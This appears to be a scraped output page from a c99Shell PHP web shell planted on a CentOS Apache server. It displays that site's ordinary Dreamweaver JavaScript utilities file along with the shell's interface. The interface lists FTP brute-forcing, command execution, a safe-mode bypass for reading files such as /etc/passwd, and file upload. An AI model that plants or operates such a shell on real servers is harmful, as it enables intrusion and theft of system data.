!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage/js/   drwxr-xr-x
Free 52.81 GB of 127.8 GB (41.32%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     utilities.js (3.59 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
// JavaScript Document
<!--
function MM_swapImgRestore() { //v3.0
  var i,x,a=document.MM_sr; for(i=0;a&&i<a.length&&(x=a[i])&&x.oSrc;i++) x.src=x.oSrc;
}


function MM_preloadImages() { //v3.0
  var d=document; if(d.images){ if(!d.MM_p) d.MM_p=new Array();
    var i,j=d.MM_p.length,a=MM_preloadImages.arguments; for(i=0; i<a.length; i++)
    if (a[i].indexOf("#")!=0){ d.MM_p[j]=new Image; d.MM_p[j++].src=a[i];}}
}


function MM_findObj(n, d) { //v4.01
  var p,i,x;  if(!d) d=document; if((p=n.indexOf("?"))>0&&parent.frames.length) {
    d=parent.frames[n.substring(p+1)].document; n=n.substring(0,p);}
  if(!(x=d[n])&&d.all) x=d.all[n]; for (i=0;!x&&i<d.forms.length;i++) x=d.forms[i][n];
  for(i=0;!x&&d.layers&&i<d.layers.length;i++) x=MM_findObj(n,d.layers[i].document);
  if(!x && d.getElementById) x=d.getElementById(n); return x;
}


function MM_swapImage() { //v3.0
  var i,j=0,x,a=MM_swapImage.arguments; document.MM_sr=new Array; for(i=0;i<(a.length-2);i+=3)
   if ((x=MM_findObj(a[i]))!=null){document.MM_sr[j++]=x; if(!x.oSrc) x.oSrc=x.src; x.src=a[i+2];}
}


function MM_openBrWindow(theURL,winName,features) { //v2.0
  window.open(theURL,winName,features);
}


var win= null;
function NewWindow(mypage,myname,w,h,scroll) {
	var winl = (screen.width-w)/2;
	var wint = (screen.height-h)/2;
	var settings  ='height='+h+',';
		settings +='width='+w+',';
		settings +='top='+wint+',';
		settings +='left='+winl+',';
		settings +='scrollbars='+scroll+',';
		settings +='resizable=no';
		win=window.open(mypage,myname,settings);
	if(parseInt(navigator.appVersion) >= 4) {win.window.focus(); }
}


function checkAllDelete(oAllCheckBox,frm) {
	for(i=0; i<frm.elements.length; i++) {
		if( (frm.elements[i].type == "checkbox") && (frm.elements[i] != oAllCheckBox) ) {
			if(oAllCheckBox.checked==true) {
				frm.elements[i].parentElement.parentElement.style.backgroundColor='#E5E9F2';
				frm.elements[i].checked=true;
			} else {
				frm.elements[i].parentElement.parentElement.style.backgroundColor='';			
				frm.elements[i].checked=false;			
			}
		} // end..if
	} // end..for
} // end..function


//----------- Confirm before Deleted
function confirmDelete(frm) { 
	//-- loop through all elements
	for(i=0; i<frm.length; i++) {
		//-- Look for our checkboxes only
		if(frm.elements[i].name.indexOf('id') !=-1) {
			//-- If any are checked then confirm alert, otherwise nothing happens
			if(frm.elements[i].checked) {
				return confirm('ต้องการลบข้อมูลที่เลือก?')
			}
		} // end..if
	} // end..for
} // end..function


//----------- Highlight Rows
function highlightRow(chkBox) {
   var IsChecked = chkBox.checked;            

  if(IsChecked) {
       chkBox.parentElement.parentElement.style.backgroundColor='#E5E9F2';  
       chkBox.parentElement.parentElement.style.color='blue'; 
  } 
  else {
       chkBox.parentElement.parentElement.style.backgroundColor='white'; 
       chkBox.parentElement.parentElement.style.color='black'; 
  }
}

//----------- Check Numeric
function checkNumeric() {
	if ((event.keyCode <45) || (event.keyCode > 57) ) {
		alert("เฉพาะตัวเลขเท่านั้น");
		event.returnValue = false;
	}
}

//----------- Check Assign 1
function checkAssign1(e1,val1) {
	if(e1.checked) {
		val1.disabled = false;
		val1.focus();
	}
}

//----------- Check Assign 2
function checkAssign2(e1,val1,e2,val2) {
	if(e1.checked) {
		val1.disabled = false;
		val1.focus();
		
		e2.checked = false;
		val2.disabled = true;
		val2.value = '';
	}
}

//-->

<!-- <meta http-equiv="Content-Type" content="text/html; charset=windows-874" /> -->

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0059 ]--